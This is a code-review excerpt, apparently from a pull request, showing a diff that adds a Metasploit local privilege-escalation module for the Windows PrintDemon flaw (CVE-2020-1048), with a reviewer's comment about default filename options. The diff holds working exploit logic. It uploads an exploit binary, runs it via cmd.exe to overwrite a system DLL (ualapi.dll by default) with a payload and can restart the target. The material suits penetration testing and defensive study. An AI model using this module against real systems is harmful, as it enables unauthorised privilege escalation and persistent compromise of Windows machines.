modules/exploits/windows/local/cve_2020_1048_printerdemon.rb

```diff
@@ -0,0 +1,174 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Yarden Shafir', # Original discovery
+            'Alex Ionescu', # Original discovery
+            'shubham0d', # PoC
+            'bwatters-r7' # msf module
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' =>
+          [
+            ['Windows x64', { 'Arch' => ARCH_X64 }]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Nov 04 2019',
+        'References' =>
+          [
+            ['CVE', '2020-1048'],
+            ['URL', 'https://windows-internals.com/printdemon-cve-2020-1048/']
+          ],
+        'DefaultOptions' =>
+          {
+            'DisablePayloadHandler' => true
+          },
+        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+      )
+    )
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+                    [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+                    [false, 'The filename for the payload to be used on the target host (%RAND%.dll by default).', nil]),
+      OptString.new('WRITABLE_DIR',
+                    [false, 'Path to write binaries (%TEMP% by default).', nil]),
+      OptString.new('OVERWRITE_DLL',
+                    [false, 'Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).', nil]),
+      OptBool.new('RESTART_TARGET',
+                  [true, 'Restart the target after exploit (you will lose your session until a second reboot).', false]),
+      OptInt.new('EXECUTE_DELAY',
+                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])
+    ])
+  end
+
+  def cve_2020_1048_privileged_filecopy(destination_file, source_file, exploit_path, force_exploit = false)
+    # Upload Exploit
+    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
+    if file?(exploit_path)
+      print_error("#{exploit_path} already exists")
+      return false unless force_exploit
+    end
+    exploit_bin = exploit_data('CVE-2020-1048', 'cve-2020-1048-exe.exe')
+    fail_with(Failure::BadConfig, 'No exploit binary found') if exploit_bin.nil?
+    write_file(exploit_path, exploit_bin)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+
+    # Run Exploit
+    vprint_status('Running Exploit')
+    begin
+      output = cmd_exec('cmd.exe', "/c #{exploit_path} #{destination_file} #{source_file}")
+    rescue Rex::TimeoutError => e
+      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
+      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
+    end
+    output
+  end
+
+  def exploit
+    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
```

Comment:
This change assumes that `datastore['EXPLOIT_NAME']` and `datastore['PAYLOAD_NAME'] ` are set to `Rex::Text.rand_text_alpha(6..14)` by default in their option definitions.

```suggestion
    exploit_name = datastore['EXPLOIT_NAME']
    payload_name = datastore['PAYLOAD_NAME']
```